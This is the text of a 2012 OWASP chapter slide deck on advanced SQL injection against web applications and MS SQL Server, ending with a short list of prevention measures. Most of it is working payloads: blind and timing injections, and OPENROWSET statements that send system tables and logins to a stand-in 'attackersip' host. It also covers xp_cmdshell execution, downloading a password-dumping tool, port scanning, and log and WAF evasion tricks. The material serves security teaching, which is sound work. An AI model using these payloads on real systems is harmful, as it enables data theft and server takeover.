Owasp Indy Q2 2012 Advanced SQLi

Advanced SQLi and Evasion Techniques

About Me

IntroductionDamian Profancik | Technical Lead/Security Services Leader

@ Apparatus, CISSPdprofancik@gmail.com

@integrisec

CreditCesar Cerrudo – CTO, IOActive Labs

o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

ModSecurity Team – Trustwave SpiderLabso http://

blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Avi Douglen – OWASP Board Member, Israelo http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf

SQL Injection Basics• Dynamic construction of SQL queries

“SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'”

• Unsanitized user input

uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd = ' '

• Excessive permissiono Web services running as privileged user with db_owner rightso Connecting to database using sa, dbo, or sysadmin accountso Lax file system permissions

Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion

Blind SQL Injection

Blind SQL Injection• Differential Analysis

Example:

http://www.someforum.com/posts.php?id=2

SELECT author, title, body FROM posts WHERE ID = 2

http://www.someforum.com/posts.php?id=2 and 1=2

SELECT author, title, body FROM posts WHERE ID = 2 and 1=2

http://www.someforum.com/posts.php?id=2 and 1=1

SELECT author, title, body FROM posts WHERE ID = 2 and 1=1

Blind SQL Injection (cont.)• Database Management System Fingerprinting

o System Functions• MS SQL Server = getdate()

• MySQL = now()

• Oracle = sysdate()

• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()

o String Concatenation• MS SQL Server = +

• MySQL = +, CONCAT()

• Oracle = ||, CONCAT()

• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'

o Query Chaining• MS SQL Server, MySQL = allows chaining with semicolon

• Oracle = does NOT allow chaining with semicolon

• Example: http://www.someforum.com/posts.php?id=2; commit --

Blind SQL Injection (cont.)• Timing Attacks

o Adding delay• SQL Server = WAIT FOR DELAY '0:0:10‘

• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null)

• PostgreSQL = pg_sleep(10)

• Oracle = Union with query that contains a lot of results

o SELECT IF(condition, true, false)

Example:

…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;

Attacking MS SQL Server

Linked and Remote Servers• OPENROWSET

Example:

SELECT * FROM OPENROWSET( 'SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'

'SELECT * FROM table' )

• OPENDATASOURCE

Example:

SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )

.DatabaseName.dbo.TableName

Data Exfiltration• Remote server INSERT

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table1')

SELECT * FROM table2

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysdatabases')

SELECT * FROM master.dbo.sysdatabases

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysobjects ')

SELECT * FROM databasename.dbo.sysobjects

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _syscolumns')

SELECT * FROM databasename.dbo.syscolumns

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table1')

SELECT * FROM databasename..table1

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table2')

SELECT * FROM databasename..table2

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

‘SELECT * FROM _sysxlogins')

SELECT * FROM databasename.dbo.sysxlogins

Privilege Escalation• Known vulnerabilities

Example:

SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation

Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt

• Often not requiredo Connection strings using SA, dbo, sysadmino Web service context

Command Execution

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM temp_table')

EXEC master.dbo.xp_cmdshell 'dir'

Uploading FilesOn attacker’s server…

1. CREATE TABLE AttackerTable (data text)

2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

On victim’s server…

3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'

Uploading Files (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM temp_table')

EXEC xp_cmdshell '"first script line" >> script.vbs'

…

EXEC xp_cmdshell '"second script line" >> script.vbs'

...

EXEC xp_cmdshell '"last script line" >> script.vbs'

EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary

Internal DB Server Exploration• Linked and Remote Servers

1. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysservers')

SELECT * FROM master.dbo.sysservers

2. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysservers')

SELECT * FROM linkedserver1.master.dbo.sysservers

3. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysdatabases')

SELECT * FROM linkedserver1.master.dbo.sysdatabases

4. Rinse and repeat…

Port Scanning

Example:

SELECT * FROM OPENROWSET('SQLOLEDB',

'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',

'SELECT * FROM table')

Evasion Techniques

Firewall Evasion• Use port 80 for outbound

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',

'SELECT * FROM table1')

SELECT * FROM table2

Log Evasion• Inject using POST parameters

• Long HTTP requestso IIS truncates requests longer than 4097 characterso Sun-One Application Server truncates at 4092 characters

Example:

http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--

WAF Evasion• Comments

o # = single line commento -- = single line commento /* */ = inline, multi-line commento /*! */ = MySQL-specific inline, multi-line comment

Example:

http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

• New lineo %0D%0A = URL-encoded newlineo %0B = URL-encoded vertical separator

Example:

http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…

WAF Evasion (cont.)• Character Encoding

o Unicode (U+02BC = ʼ)o CHAR()o Hexadecimalo URL-encodingo Double Encoding

Example:

Double Encoding:

URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…

WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM…

Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

WAF Evasion (cont.)• Concatenation

o EXEC()o Split/Joino Special Characters (i.e. ‘[‘, ‘+’, ‘%’, etc.)

Example:

Split/Join:

URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users

WAF = id=SELECT name

id=password FROM users

ASP/ASP.Net = id=SELECT name,password FROM users

Special Characters:

URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users

WAF = id=SEL%ECT name,password FR%OM users

ASP/ASP.Net = id=SELECT name,password FROM users

SQL Injection Prevention

SQLi Prevention• Sanitize User Input

o Normalize Inputo Whitelistso Built-in Functionso Regular Expressionso Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)

• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall

Q & A